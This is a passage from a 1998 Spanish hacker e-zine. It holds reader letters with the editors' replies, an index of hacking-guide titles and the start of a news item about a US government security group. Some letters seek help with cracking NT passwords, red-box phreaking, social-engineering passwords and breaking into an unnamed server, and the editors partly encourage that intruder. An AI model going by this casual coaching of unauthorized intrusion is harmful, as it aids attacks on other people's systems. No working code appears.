  6183.   mas de como atacar en condiciones las particiones NTFS por que los programas
  6184.   PWdump y tal... Son un poco fuleros o por lo menos las versiones que yo
  6185.   tengo, solo permiten ver los directorios inutiles donde no hay nada
  6186.   interesante K:( Por cierto solo hablais de sistemas UNIX/LINUX, y muchos
  6187.   servidores funcionan con la basurilla del Sr. Bill Gates. La verdad es que
  6188.   no tengo mucha idea y creo que no puedo ofrecer una opinion real, sobre los
  6189.   Bugs del NT. Pero a un asi lo tengo en casa y ultimamente casca bastante.
  6190.   Me gustaria saber algunas cosas:
  6191.  
  6192.    - Teneis una BBS hack por la zona centro...
  6193.    - Que version de LINUX me recomendais.
  6194.    - Teneis intercambio de correo sobre desarroyo de hw y sw para realizar :-)
  6195.  
  6196.   Buneo no se se conseguire realizar algo guapo para el NT, de todas formas
  6197.   segun avance os envio codigo fuente y algunas pruebas para que lo
  6198.   publiqueis en el ezine, tengo intencion de adjuntar todos los programas
  6199.   posibles para hakear el sistema virus NT.
  6200.  
  6201.   A por cierto ya os he dicho que soy un newbie, pero tego ganas de ayudaros
  6202.   y aprender, si necesitais algo sobre electronica, micros, etc... podeis
  6203.   contactar conmigo.
  6204.  
  6205.   <------>
  6206.  
  6207.   [ Pues muchas gracias, ya sabemos que el ezine se a dedicado mucho a Unix,
  6208.     pero eso no significa que no trabajemos con NT, mas adelante iremos
  6209.     poniendo cosillas :)
  6210.     Para pillar cosas buenas de NT, te recomendamos los siguientes url∩s :
  6211.  
  6212.     http://l0pht.com/
  6213.     http://207.98.195.250/  (Rhino9)
  6214.     http://www.ntshop.net
  6215.     http://ciac.llnl.gov/ciac/ToolsUnixSig.html#Md4  Codigo del MD4   
  6216.  
  6217.     Por desgracia no contamos con BBS, sobre Linux depende lo que quieras
  6218.     hacer y por el momento no tenemos mailing list pero estamos en ello.
  6219.     Pues ya sabes envianoslo cuando lo tengas listo, tenemos ganas de verlo. ]
  6220.  
  6221. <────────────────────────────────────────────────────────────────────────────>
  6222.  
  6223.   From:  jaina7@xxxxxxxxxxxxxx (grieko)
  6224.   To:  jjf_team@usa.net  
  6225.   Subject:  hola como estan  
  6226.  
  6227.   saben su page esta muy bien pero baje un archivo que decia 
  6228.   hackear page en español pero nada estaba en ingles 
  6229.   espero que pronto lo pongan en español 
  6230.  
  6231.   <------>
  6232.  
  6233.   [ Pues eso a sido un descuido del webmaster y ese documento no sera
  6234.     traducido por nosotros por lo que si alquien lo quiere traducir, pues ya
  6235.     sabe. ]
  6236.  
  6237. <────────────────────────────────────────────────────────────────────────────>
  6238.  
  6239.   From:  c_plaza@xxxxxxxxxxxxxx
  6240.   To:  jjf_team@usa.net  
  6241.   Subject:  informarles y agradecimiento  
  6242.  
  6243.   un saludo antes que nada y gracias por la informacion que brindan a todos
  6244.   los cibernautas de este planeta. 
  6245.  
  6246.   me dirijo en la oprtunidad de avisarles que tengo una pagina en la cual he 
  6247.   utilizado fragmentos de sus composiciones asi como tambien les recomiendo a
  6248.   las personas que visiten mi pagina, que para mayor informacion se dirijan a
  6249.   la pagina de ustedes. mi pagina es
  6250.   http://www.geocities.com/Heartland/Plains/3102
  6251.  
  6252.   nota: espero que si esta en la posibilidad de ustedes me sirvan dar algunos 
  6253.   consejos. 
  6254.  
  6255.   att. Carlos Plaza 
  6256.  
  6257.   <------>
  6258.  
  6259.   [ Okis :) ]
  6260.  
  6261. <────────────────────────────────────────────────────────────────────────────>
  6262.  
  6263.   From:  plaxius <plaxius@xxxxxxxxxxxxxx>
  6264.   To:  jjf_team@usa.net  
  6265.   Subject:  ííProyecto_R !!  
  6266.  
  6267.    Hola estimados : 
  6268.  
  6269.   Un gustazo saludarlos de nuevo , y felicitarlos ya que el numero cuatro 
  6270.   estubo fantastico y parece que esto suma y sigue . Bueno solo queria 
  6271.   contarles que ya hemos terminado el primer nuemro de 
  6272.   Proyecto_R , los invito a que nos den su sincera opinion y criticas 
  6273.   ojala constructivas , para que nos ayuden a mejorar ciertos aspectos del
  6274.   E-Zine la verdad es bastante pobre (creo yo ) pero tendra que 
  6275.   ir mejorando a medida que se nos unan mas colaboradores . Les adjunto el 
  6276.   primer numero y si puden poner un enlze desde vuestro web como tambien 
  6277.   mencionar la direccion en su E-Zine , estaria eternamente agradecido ... 
  6278.  
  6279.   URL Proyecto_R : http://www.bigfoot.com/~proyecto_r 
  6280.  
  6281.   http://www.geocities.com/colosseum/sideline/9497 
  6282.  
  6283.   GRacias ...---- 
  6284.  
  6285.   PlaXiuS . 
  6286.  
  6287.   <------>
  6288.  
  6289.   [ Claro que os ponemos un enlace :) y a todos nuestros lectores decirles
  6290.     que pasaros por el url y pillad este nuevo ezine. Nos ha gustado mucho
  6291.     el ezine y esperamos que siga mejorando. ]
  6292.  
  6293. <────────────────────────────────────────────────────────────────────────────>
  6294.  
  6295.   From:  "SPIDER" <jlcastil@xxxxxxxxxxxxxx>
  6296.   Subject:  saludo  
  6297.  
  6298.   Les envio un saludo, y felicitaciones por su magnifica pag. 
  6299.  
  6300.   Espero que esto lo hagan aun mas grande, es genial 
  6301.  
  6302.   hasta pronto... 
  6303.  
  6304.   ATTE: SPIDERIDER 
  6305.  
  6306.   <------>
  6307.  
  6308.   [ thx, estamos en ello. ] 
  6309.  
  6310. <────────────────────────────────────────────────────────────────────────────>
  6311.  
  6312.   Date:  Sun, 02 Aug 1998 13:05:55 GMT  
  6313.   From:  "Alfredo Kreim" <the_argie@xxxxxxxxxxxxxx>      
  6314.   To:  conde_vampiro@usa.net  
  6315.   Subject:  Ayuda  
  6316.  
  6317.   Estimado Conde Vampiro: No soy ni H/P/C ni nada que se le parezca. Ni 
  6318.   siquiera soy un Lamer. Mi actividad es el periodismo de investigacion 
  6319.   (corrupcion politica, negociados turbios, etc.). Por supuesto que esto 
  6320.   molesta a algunos y es por eso que me dirijo a uds. para preguntarles si 
  6321.   me pueden dar alguna ayuda. Tengo mis lineas telefonicas pinchadas, o 
  6322.   sea escuchan mis conversaciones. Algunas son importantes para descubrir 
  6323.   cosas sucias y corren peligro mis fuentes de informacion si son 
  6324.   identificadas. Mi requerimiento es: existe algun programa (tengo una 
  6325.   Pentium 100 con Windows 95) que me permita escudriñar la linea y poder 
  6326.   detectar si me estan grabando o interceptando la comunicacion?. De no 
  6327.   existir, conocen algun diseño electronico que permita construir algun 
  6328.   rastreador (que tenga componentes baratos ya que mi cuenta esta vacia)?. 
  6329.   Es posible una vez detectado el hijo de puta fizgon mandarle algo para 
  6330.   que no joda mas?. Desde ya les agradezco todo lo que puedan hacer para 
  6331.   darme una ayuda. Lamento no saber Unix, y tambien lamento no ser mas 
  6332.   joven. Ya cerca de los 50 me resulta un tanto pesado estudiar, aunque 
  6333.   trato de leer algo nuevo de programacion todas las veces que puedo. 
  6334.   Tengo la oportunidad ahora de leer un par de libros para empezar a 
  6335.   programar en Java. Me gustaria me dieran su opinion si vale la pena o 
  6336.   mejor me dedico a seguir persiguiendo politicos sucios. Por ultimo, mi 
  6337.   ingles tecnico no es demasiado abultado, por ello si encuentran algo en 
  6338.   castellano mejor. Un abrazo y sigan asi. Me gusta mucho leer la pagina 
  6339.   JJF Hackers Team. Chau. Alfredo. 
  6340.  
  6341.   <------>
  6342.  
  6343.   [ Esto me suena a peli de James Bond :), pues decirte que hay varias
  6344.     empresas que se dedican a estos asuntos. En barcelona y en Madrid tienes
  6345.     unas tiendas llamadas LA TIENDA DEL ESPIA, en la que podras comprar
  6346.     encriptadores para las conversaciones telefonicas y mas juguetes.
  6347.     Y que no te cojan alfredo :) ]
  6348.  
  6349. <────────────────────────────────────────────────────────────────────────────>
  6350.  
  6351.   Date:  Tue, 04 Aug 1998 19:03:52 GMT  
  6352.   From:  Sergio <carlos29@xxxxxxxxxxxxxx>      
  6353.   To:  conde_vampiro@usa.net  
  6354.   Subject:  Hola COnde  
  6355.  
  6356.   Hola soy Sergio y me interesaria un buen programa para pasarme los 
  6357.   passwords que me piden las web porno, tengo WINDOWS95 ya me diras
  6358.   alguna cosa gracias soy carlos29@xxxxxxxxxxxxxx Adios 
  6359.  
  6360.   <------>
  6361.  
  6362.   [ Por favor !!!!! tenemos mejores cosas que hacer. ]
  6363.  
  6364. <────────────────────────────────────────────────────────────────────────────>
  6365.  
  6366.   From:  "Pablo Garcia del Pino" <icelord@xxxxxxxxxxxxxx>
  6367.   To:  jjf_team@usa.net  
  6368.   Subject:  Problemas en tus URL  
  6369.  
  6370.   Tio: 
  6371.  
  6372.   Muy buena pagina la tuya pero... cuando vas a bajarte por ejemplo los tonos
  6373.   de la red-box, informacion para red-box etc... Te encuentras el error 404
  6374.   es decir que el link de URL no existe.
  6375.   Por favor, este tema me interesa bastante, con lo que a ver si pudierais
  6376.   enviarme estos archivos, o si no decirme como conseguirlos.
  6377.  
  6378.   Gracias. 
  6379.  
  6380.   Icelord 
  6381.  
  6382.   http://www.pasanet.es/usuarios/icelord/ 
  6383.  
  6384.   icelord@xxxxxxxxxxxxxx 
  6385.  
  6386.   <------>
  6387.  
  6388.   [ Ya decimos que los link∩s en los web∩s son dificl de mantener, pero
  6389.     el webmaster hace lo que puede. ]
  6390.  
  6391. <────────────────────────────────────────────────────────────────────────────>
  6392.  
  6393.   Date:  Fri, 14 Aug 1998 18:45:35 GMT  
  6394.   From:  Cain <Nod@xxxxxxxxxxxxxx>      
  6395.   To:  jjf_team@usa.net  
  6396.   Subject:  Para el e-zine ( Correo del lector)  
  6397.  
  6398.   Sonara muy tipico.. pero felicidades por vuestra pagina, y gracias por 
  6399.   enseñarnos.... Bueno mejor voy al grano ok? Bien en el e-zine he visto 
  6400.   que explicais cosas sobre el hacking, pero siempre bajo Unix. A alguien 
  6401.   se le ha ocurrido la idea de hacerlo desde Windows? ( No os riais de mi 
  6402.   please ) Soy consciente de que a muchos programadores la simple idea de 
  6403.   trabajar con windows les parece ridicula, y que consideran que es un 
  6404.   sistema para supernovatos... y tal vez sea asi, pero tambien es verdad 
  6405.   que se puede hacer hacking desde windows ¿o no? La señorita Carolyn 
  6406.   Meinel asi lo explica, y el señor IPgh0st hace la traducion de dichos 
  6407.   documentos... entonces.. porque no se amplia mas sobre el tema? ¿Son 
  6408.   conscientes de que para millones de usuarios, que usan Windows por 
  6409.   motivos varios les seria mucho mas facil trabajar desde este "¿Sistema?" 
  6410.   ( Lo pongo entre comillas para que nadie se me ofenda ok?) Bueno pues lo 
  6411.   dicho, creo que seria interesante abarcar esa posibilidad, aqunue soy 
  6412.   consciente que es una tarea un tanto pesada... Igualmente estoy 
  6413.   convencido que se haria un gran favor a los aprendices de hackers ( 
  6414.   Incluyendome entre ellos). 
  6415.   Gracias por dedicar su tiempo a mi e-mail, y espero seguir 
  6416.   disfrutnado de su informacion, y de sus sabios consejos. 
  6417.  
  6418.                                And he exilied me 
  6419.                                To wander in darkness 
  6420.                                The land of Nod 
  6421.                                I flew into the darkness 
  6422.                                I saw no source of light 
  6423.                                And I was afraid 
  6424.                                And Alone. 
  6425.  
  6426.                                             Fragment of Book of Nod. 
  6427.                                                                      
  6428.   Cain. 
  6429.  
  6430.   <------>
  6431.  
  6432.   [ Thx, ¿ Pero quien dice que no tocamos nada sobre windows ?, pues
  6433.     seguro que este numero te gustara :), ademas nosotros estamos trabajando
  6434.     en varios proyectos para windows que iran saliendo durante este año.
  6435.     Pero esperamos que los lectores tambien nos envien articulos sobre
  6436.     windows. ]
  6437.  
  6438. <────────────────────────────────────────────────────────────────────────────>
  6439.  
  6440.   Date:  Mon, 17 Aug 1998 19:28:58 GMT  
  6441.   From:  "ZeD" <ZeD@xxxxxxxxxxxxxx>      
  6442.   Subject:  varias cosas  
  6443.  
  6444.   hola os mando esto para deciros varias cosas,la primera es que lei una 
  6445.   carta de un lector en el nº5 de la revista,que decia que le gustaria que en 
  6446.   vuestro e-zine saliese una especie de "dicciohack",la verdad es que no me 
  6447.   parece mala idea,ya que muchos de los terminos que se usan cambian de 
  6448.   nombre y ademas no siempre se conocen todos,ya que salen nuevos cada muy 
  6449.   poco tiempo. 
  6450.  
  6451.   en segundo lugar queria comentar a todos los que os escriben diciendoos que 
  6452.   quieren aprender hackear,que si lo haces bien,le pones empeño ypor supuesto 
  6453.   no es una "vena" transitoria de esas que nos dan a todos de vez encuando 
  6454.   despues de leer o ver alguna azaña en television o en algun periodico,no es 
  6455.   tan dificil aprender y desde este como desde muchos e-zines y webs podeis 
  6456.   ir aprendiendo (poco a poco claro,esto noes algo que se prenda en dos 
  6457.   semanas),existen mogollon de libros sobre seguridad informatica,sistemas 
  6458.   operativos...ect... que si los lees,puedes parender muchas cosas,ademas ¿no 
  6459.   dicen que en internet esta todo? pues buscad guias de iniciacion o 
  6460.   documentos para "newbyes" (o como coñe se scriba la palabreja esa). 
  6461.  
  6462.   la tercera cosa que queria comentaros es una cuestion que me preguntaron el 
  6463.   otro dia en un canal de irc y la verdad es que no supe contestarte,la 
  6464.   pregunta que me hicieron es la siguiente: 
  6465.   "¿se puede hackear (se referia a entrar en un sistema,obviamente) desde 
  6466.   windows95?" yo la verdad es que no lo se y apartir de que me hizieran esa
  6467.   pregunta,a mi tambien me corroe la curiosidad,como ya se que si se puede no
  6468.   vais a decir el como,no os lo pregunto,simplemente me gustaria un "si" o
  6469.   un "no" ;-)
  6470.  
  6471.   mas cosillas,como decis vosotros sin colaboracion no hay trabajo,por lo 
  6472.   tanto les mando tres textos para que,si quereis los incluyais en el proximo 
  6473.   nº de vuestro e-zine.el primero es sobre como trucar el windows95,aqui 
  6474.   explico la manera de adecuar el SO mas utilizado (por desgracia o por 
  6475.   fortuna,segun para quien),al gusto del usuario y no al de los creadores del 
  6476.   jodio sistema en cuestion. 
  6477.   el segundo es una especie de guia para el irc en la que explico como 
  6478.   conseguir cosas (contraseñas...etc...) por medio de ingenieria 
  6479.   social,tambien incluye una pequeña guia de como usar dos de las tools que 
  6480.   hay para los famosos PWL. 
  6481.   el tercer texto va dedicado a los phreackers novatos o gente que se quiera 
  6482.   iniciar en este campo,entre las cosas que se comentan en este texto incluyo 
  6483.   una descripcion de algunas de la BOX mas conocidas.os los mando los 3 
  6484.   comprimidos en un zip para que ocupen menos y no tardeis mucho en bajaros 
  6485.   este e-mail. 
  6486.  
  6487.   deciros que soy miembro del grupo HaCk`S-wEb-RiNg y que siempre que sale un 
  6488.   nuevo nº de vustro e-zine lo pillamos rapidamente por que mola mazo y 
  6489.   deciros que en nombre de todo el grupo,os mandamos un saludo,si quereis 
  6490.   visitar nuestra web.... 
  6491.   lo llevais claro por que todavia esta "under construccion" pero ya le falta 
  6492.   menos y cuando este acabado en los link`s pondremos uno a vuestra web,que 
  6493.   mola mazo ¿fale? :-) 
  6494.  
  6495.   por cierto (ya acabo) en algunos e-zines (no voy a decir cuales) tienen una 
  6496.   "lista de correo" en la que avisan cuando sale un nuevo nº ¿por que no 
  6497.   haceis vosotros lo mismo? 
  6498.  
  6499.   bueno siento averos dado la barrila pero he tardado en decidirme a 
  6500.   escribiros y ahora lo suelto todo de golpe ;-) 
  6501.   un saludo y feliz HaCk (esto me suena) bye 
  6502.  
  6503.   { ZeD ----- http://www.angelfire.com/ak/HACKZED/ZED2.html ------ } 
  6504.   esta es la direccion de mi web,por si la quereis poner en el e-zine 
  6505.  
  6506.   <------>
  6507.  
  6508.   [ Sobre un diccionario hack ya hemos pensado sobre ello y mas adelante ya
  6509.     veras :) Decirte sobre win95 "SI". Sobre el mailing list estamos en ello,
  6510.     pero no hemos dicho nada ya que dentro de poco habra cambios radicales en
  6511.     el website ;-)
  6512.     Thx por tus artis y nos gusta que otros grupos nos apoyen, saludos de
  6513.     - J.J.F. / HACKERS TEAM -, por cierto hemos visto tu ezine y tu web :)
  6514.     y decirte que este ezine se llama J.J.F. / HACKERS TEAM JOURNAL. byes ]
  6515.  
  6516. <────────────────────────────────────────────────────────────────────────────>
  6517.  
  6518.   From:  "Pepe Pepe2" <sir_ich@xxxxxxxxxxxxxx>
  6519.   To:  conde_vampiro@usa.net  
  6520.   Subject:  Sir Ich  
  6521.  
  6522.   Hola conde soy Sir Ich, estoy leyendome los articulos que realizas sobre
  6523.   hackers y quisiera saber si podrias decirme algun texto mas donde 
  6524.   empezar porque quiero aprender en esto del hack. 
  6525.  
  6526.   Por cierto me gustaron bastante tus articulos. 
  6527.  
  6528.   Lo que me gustaria es que me enseñaras o que me dieras consejos o textos 
  6529.   sobre como empezar en esto del hack. 
  6530.  
  6531.   Bueno sin mas me despido hasta la proxima esperando tu respuesta. 
  6532.  
  6533.   Muchas gracias por leer esta carta y por haberme atendido. 
  6534.  
  6535.   Mi correo es sir_ich@xxxxxxxxxxxxxx 
  6536.  
  6537.   <------>
  6538.  
  6539.   [ Bueno pues logicamente tienes nuestro/vuestro ezine que es un medio ideal
  6540.     para aprender, pero no solo de textos vive el hacker :)
  6541.     Nuestro consejo es el de siempre, estudia, aprende y mejora las cosas. ]
  6542.  
  6543. <────────────────────────────────────────────────────────────────────────────>
  6544.   
  6545.   Date:  Tue, 18 Aug 1998 16:54:02 GMT  
  6546.   From:  "Alfredo Kreim" <the_argie@xxxxxxxxxxxxxx>      
  6547.   To:  conde_vampiro@usa.net  
  6548.   Cc:  mr.electro@usa.net  
  6549.   Subject:  Ayuda  
  6550.  
  6551.   Muchachos, estoy en un problema. Soy periodista y hago notas 
  6552.   investigando a politicos corruptos, policias corruptos, jueces 
  6553.   corruptos, en fin, a toda la lacra que anda dando vueltas por ahi. 
  6554.   Descubri que me pinchan mis lineas telefonicas y escuchan y graban mis 
  6555.   conversaciones, lo que -por supuesto- me jode y ademas pone en riesgo a 
  6556.   mis informantes (gente decente que cree que los hijos de puta tienen que 
  6557.   estar en una jaula y los buenos disfrutar la vida). Primera pregunta: 
  6558.   ¿hay algun programa que me permita descubrir con certeza la pinchadura y 
  6559.   localizar al espia?. Segunda pregunta: Si existe, ¿es posible bloquear e 
  6560.   impedir que me escuchen y graben?. Tercera pregunta: ¿Hay manera de 
  6561.   romperles el culo cagandoles el equipo que estan usando?. Cuarta 
  6562.   pregunta: Si todo lo anterior es negativo, ¿habra por ahi planos y 
  6563.   manuales en castellano para construir algun aparatito electronico que 
  6564.   realice la tarea descripta mas arriba?. Si necesitan mas datos acerca 
  6565.   del tipo de central y equipos que tiene la proveedora del servicio 
  6566.   telefonico, avisenme que lo averiguo y se los paso. Muchas gracias desde 
  6567.   ya, y quedo a la espera de alguna novedad de uds. Un abrazo. 
  6568.   Alfredo 
  6569.  
  6570.   <------>
  6571.  
  6572.   [ Otra vez el espia !!! Pues ya te hemos dado la respuesta mas arriba, y
  6573.    estas cosas si que se pueden realizar pero tienes que ser un manitas en
  6574.    phreaking y por supuesto electronica, hhhuum cosa que veo dificil. ] 
  6575.  
  6576. <────────────────────────────────────────────────────────────────────────────>
  6577.  
  6578.   Date:  Sun, 23 Aug 1998 15:30:31 GMT  
  6579.   From:  "ADRIAN" <admar@xxxxxxxxxxxxxx>      
  6580.   Subject:  me_gusta_mucho_la_presentacion__  
  6581.  
  6582.   Bueno tienen un monton de programas buenisimos,y actuales, se ven poco por
  6583.   la red asi que sigan adelante muchachos ,otra cosa me mandan la direccion
  6584.   de la pagina en internet?
  6585.   es que la encontre en un buscador cabron que no me deja ver la direccion.. 
  6586.  
  6587.   <------>
  6588.  
  6589.   [ Pues facil, cuando te pones encima de nuestro enlace en ese buscador
  6590.     seguro que te sale nuestro url abajo a la izquierda en tu navegador.
  6591.     Ademas si pinchas encima te sale nuestro url en el prompt del navegador
  6592.     y encima nuestro url sale en nuestro ezine, creo que mas facil no se
  6593.     puede :) ]
  6594.  
  6595. <────────────────────────────────────────────────────────────────────────────>
  6596.  
  6597.   Date:  Sat, 29 Aug 1998 08:20:37 GMT  
  6598.   From:  "Ana Maria Hermida" <ahermida@xxxxxxxxxxxxxx>      
  6599.   To:  conde_vampiro@usa.net  
  6600.  
  6601.   Hola 
  6602.  
  6603.   Estoy algo desesperado y no se que hacer. Llevo mas de 5 meses 
  6604.   intentando entrar en un server. 
  6605.   He sacado mucha informacion sobre los ordenadores que estan en su red 
  6606.   (tengo mas de 20) y sobre 
  6607.   los protocolos que otiliza en cada uno de sus puertos, asi como los 
  6608.   dorectorios que exporta. 
  6609.   Pero parece que todas las versiones estan libres de bugs ... que puedo 
  6610.   hacer? como podria 
  6611.   entrar en alguno de esos server? En todos los manuales y articulos de 
  6612.   las revistas pone que 
  6613.   es muy facil y blablabla pero yo no consigo nada ... y eso que tengo 
  6614.   buenos conocimientos de 
  6615.   informatica :( 
  6616.  
  6617.   Me puedes echar una mano? gracias 
  6618.  
  6619.   <------>
  6620.  
  6621.   [ Pues que decir, no conozco ningun sistema perfecto libre de bugs.
  6622.     No estaras enfocando correctamente la situacion, revisa a fondo toda la
  6623.     informacion que has recopilado. Pero si tan frustado estas mejor dejalo,
  6624.     en el hack no todo son alegrias y exitos. ]
  6625.  
  6626. <────────────────────────────────────────────────────────────────────────────>
  6627.  
  6628.   Date:  Sat, 29 Aug 1998 09:57:42 GMT
  6629.   From:  "ZeD" <ZeD@xxxxxxxxxxxxxx>      
  6630.   Subject:  virus muy raro  
  6631.  
  6632.   hola vereis no se si os acordareis de mi (os mande tres textos hace una dos 
  6633.   o tres semanas) tengo un "pequeño" problema con algo que creo puede ser un
  6634.   virus a ctualmente estoy usando el WINDOWS95 y hoi (29/8/98) se me a
  6635.   activado lo que creo puede ser un virus lo que hace este es lo siguiente 
  6636.   al abrir cualquier cosa con el NOTEPAD (solo con el note,con el wordpad no 
  6637.   me pasa nada) 
  6638.   la pantalla se me llena de iconos de error (el del windows que es un 
  6639.   circulo rojo con una "X" blanca en medio) 
  6640.   estos los puedo "borrar" si paso por encima de ellos el documento que he 
  6641.   abierto 
  6642.   me pasa lo mismo cuando intento conectarme a internet y tambien los puedo 
  6643.   borrar si paso el cuadro de dialogo 
  6644.   (el de "conectando a internet") por encima de ellos. 
  6645.   actualmente uso el antivirus ANYWARE y este no me detecta nada raro y la 
  6646.   verdad no se de que virus se puede trar y mucho menos como eliminarlo. 
  6647.   yo la verdad es que de virus no tengo ni idea,por eso recurro a vosotros 
  6648.   aver si,vosotros o alguno de vuestros lectores saben como poder ayudarme 
  6649.   con el "virus" (o lo que sea). 
  6650.  
  6651.   si vosotros no podeis ayudarme y publicais esto en el e-zine poned esta 
  6652.   direccion de correo para que me contesten (si alguien sabe la respuesta 
  6653.   claro) la dire es: zed@mixmail.com 
  6654.  
  6655.   bueno,no os aburro mas un saludo 
  6656.  
  6657.   \\'// 
  6658.   (o -) 
  6659.   -ooO--(_)--Ooo- 
  6660.   --..--ZeD--..-- 
  6661.   http://www.angelfire.com/ak/HACKZED/ZED2.html 
  6662.   http://come.to/HaCkS-wEb-RiNg 
  6663.   !visitalasí 
  6664.   !!EL DIA 3/9/98 TODOS A LA HUELGAíí 
  6665.  
  6666.   <------>
  6667.  
  6668.   [ Es la primera vez que oigo semejante historia, si esto es un virus lo
  6669.     desconozco pero huele mas al tipico programa bromista de win95, has
  6670.     mirado en Inicio o en el registro, en busca de algo sospechoso. ?
  6671.     Si algun lector reconoce estos sintomas pues que nos escriba. ]
  6672.  
  6673. <────────────────────────────────────────────────────────────────────────────>
  6674.  
  6675.   Date:  Sun, 30 Aug 1998 16:58:52 GMT  
  6676.   From:  Muerte <necrolibro@xxxxxxxxxxxxxx>      
  6677.   To:  jjf_team@usa.net  
  6678.   Subject:  Red IRC Union Latina  
  6679.  
  6680.    NecroSaludos, 
  6681.  
  6682.   Pueeee... no habia descubierto su e-zine hasta hace poco, y ke esta 
  6683.   muuu bien y es muu interesante. A parte, me gustaria incluir un link a 
  6684.   su pagina, pues eso dense una vuelta por la web de abajo del tooo (si la 
  6685.   de Necronomicon...) y se meten en la Guia de Temas Olvidados y luego en 
  6686.   Añadir un Enlace y rellenan el formulario, pa meterles un enlace dentro 
  6687.   de la seccion Red. Ke porke no se lo meto yo... pues porke no se ke 
  6688.   descripcion meterles, y como ya hice con SET les escribe un e-mail y les 
  6689.   dije ke me dijesen una descripcion, y luego yo la meto... 
  6690.  
  6691.   A parte de esto... pasando al tema ke me ocupa. Seguro ke ustedes 
  6692.   conocen mazo de redes de IRC, pero Hispanas, pueee seguro ke conocen el 
  6693.   IRC-Hispano, ┐pero y a parte de esa?, ninguna tal vez, pues yo les 
  6694.   escribo esto pa decirles ke hay una alternativa al IRC-Hispano y se 
  6695.   llama... Union Latina, sus servers son los siguientes: 
  6696.  
  6697.   Union Latina: Comunet (ES, Bilbao): comunet.unionlatina.org 
  6698.   Union Latina: Digital (ES, Madrid): madrid.unionlatina.org 
  6699.   Union Latina: Dragonet (ES, Alicante): dragonet.unionlatina.org 
  6700.   Union Latina: Interlink (ES, Madrid): interlink.unionlatina.org 
  6701.   Union Latina: Lander (ES, Madrid): lander.unionlatina.org 
  6702.   Union Latina: Telebase (ES, Alicante): telebase.unionlatina.org 
  6703.   Union Latina: Tinet (ES, Tarragona): tinet.unionlatina.org 
  6704.  
  6705.   Su pagina web oficial es: 
  6706.  
  6707.   http://www.unionlatina.org 
  6708.  
  6709.   Su bot es KaOs, y no tiene nada ke ver con el amigo Scytale. Pues pa ke 
  6710.   les interesa esto, seguro ke hay mazo de gente, como yo, ke somos 
  6711.   usuarios de proveedores de bancos y ke tenemos la entrada prohibida 
  6712.   (G-Line) al IRC-Hispano o ke estamos hasta los gⁿevos de tanto 
  6713.   IRC-Hispano... Pues ya tienen una alternativa real. Seguro ke si se dan 
  6714.   una vuelta les convence... 
  6715.  
  6716.   Pues nada solo keria ke dieran a conocer esta info en su e-zine, si pa 
  6717.   ke la gente sepa ke hay una alternativa a la Red IRC-Hispano. Y ke esta 
  6718.   muy bien esa alternativa se llama Union Latina y sus IRCops son muuu 
  6719.   majos. 
  6720.  
  6721.   Pues naaa maxx... si puedo ayudarles en algo diganmelo.. y sigan asi y 
  6722.   pa mas arriba... 
  6723.  
  6724.   Mushas gracias por tooo y sigan asi... 
  6725.  
  6726.   Un Saludo de Muerte (Director del Necronomicon) 
  6727.  
  6728.   NECRONOMICON (El Libro de los Muertos) 
  6729.   http://members.xoom.com/necrolibro 
  6730.  
  6731.   EN EL IRC: 
  6732.  
  6733.   Nick: |Muerte 
  6734.   Lugar: #necronomicon en Union Latina 
  6735.   Todos los sabados y domingos sobre las 16:00 
  6736.  
  6737.   <------>
  6738.  
  6739.   [ Thx pero nosotros ya conociamos la existencia de esta red de IRC en
  6740.     España junto con la de Hispanos y otras academicas.
  6741.     Pero para el que no lo sepa ya no tiene excusa :) ]
  6742.  
  6743. <────────────────────────────────────────────────────────────────────────────>
  6744. ██████████████████████████████████████████████████████████████████████████████
  6745. <────────────────────────────────────────────────────────────────────────────>
  6746.  
  6747.                            ------------------------
  6748.                            - NOTICIAS UNDERGROUND -
  6749.                            ------------------------
  6750.   
  6751.                                                 - J.J.F. / HACKERS TEAM -
  6752.  
  6753. <────────────────────────────────────────────────────────────────────────────>
  6754.   INDICE DE LAS NUEVAS Guide to (mostly) Harmless Hacking
  6755.  
  6756.   # Vol. 5 Programmers' Series
  6757.  
  6758.     No. 2: Shell Programming: an Exploit Explained, Part 1
  6759.  
  6760.  
  6761.   # Vol. 5 Programmers' Series
  6762.  
  6763.     No. 2: Shell Programming: an Exploit Explained, part 2
  6764.  
  6765.  
  6766.   # Vol. 5 Programmers' Series
  6767.  
  6768.     No. 3: More on Advanced Unix Shell Programming
  6769.  
  6770.  
  6771.   # Microsoft-only version Number 1
  6772.  
  6773.     Getting Serious with Win95
  6774.  
  6775.  
  6776.   # Microsoft-only version Number 2
  6777.  
  6778.     Hacking with Win95/NT: Batch File Programming
  6779.  
  6780.  
  6781.   # Microsoft-only version Number 3
  6782.  
  6783.     Hacking with Win95/NT:  How to Telnet
  6784.  
  6785.     How to Break into a Windows 95 Computers from the Internet
  6786.  
  6787.  
  6788.   # Vol. 3 No. 7, Part 1
  6789.  
  6790.     Introduction to Computer Viruses
  6791.  
  6792.  
  6793.   # Vol. 3 No. 7, part 2
  6794.  
  6795.     Introduction to Computer Viruses
  6796.  
  6797.  
  6798.   # Vol. 6 Real Hackers
  6799.  
  6800.     No. 2: Harold Willison
  6801.  
  6802.  
  6803.   # Vol. 3 No. 8, Part 1
  6804.  
  6805.     The Magical Mystical Crypto-Primer
  6806.  
  6807.  
  6808.   # Vol. 3 No. 8, Part 2
  6809.  
  6810.     The Magical Mystical Crypto-Primer
  6811.  
  6812. <────────────────────────────────────────────────────────────────────────────>
  6813.   ¿ QUIEN SE QUIERE PROTEGER DE LOS HACKERS ? EL GRUPO SHADOW LO SABE.
  6814.  
  6815.   OTC 7/23/98 8:25 AM 
  6816.  
  6817.   WASHINGTON, D.C., U.S.A., 1998 JUL 23 (Newsbytes) -- 
  6818.  
  6819.   By Shawn P. McCarthy, Government Computer News. 
  6820.                             
  6821.         Los Hackers han ayudado a romper las redes del gobierno. Ellos
  6822.   comparten sus recursos y tecnicas en determinadas listas de correo y en
  6823.   areas de chat encriptadas. Los adminstradores de seguridad del Gobierno
  6824.   Americano estan formando grupos similares para combatir de una forma mas
  6825.   eficaz a los intrusos.
  6826.                                                               
  6827.         Un pequeño grupo de experto en seguridad del gobierno han estado
  6828.   usando este metodo con el sector opuesto de la industria. El intercambio
  6829.   a servido para formar un concenso, no del todo aceptado, sobre que hacer
  6830.   cuando una red privada a sido penetrada por un intruso via Internet.
  6831.                                                                          
  6832.         El grupo Shadow incluye representantes de diferentes departamentos
  6833.   de defensa, Laboratorio Nacional de los Alamos. Los representantes
  6834.   corporativos provienen desde General Dynamics Corp hasta Disney Online.
  6835.                                                     
  6836.         Dos grandes esfuerzos han sido obtenidos en este proceso. El primero
  6837.   es un libro: Computer Security Handling Step by Step. Publicado por Sans
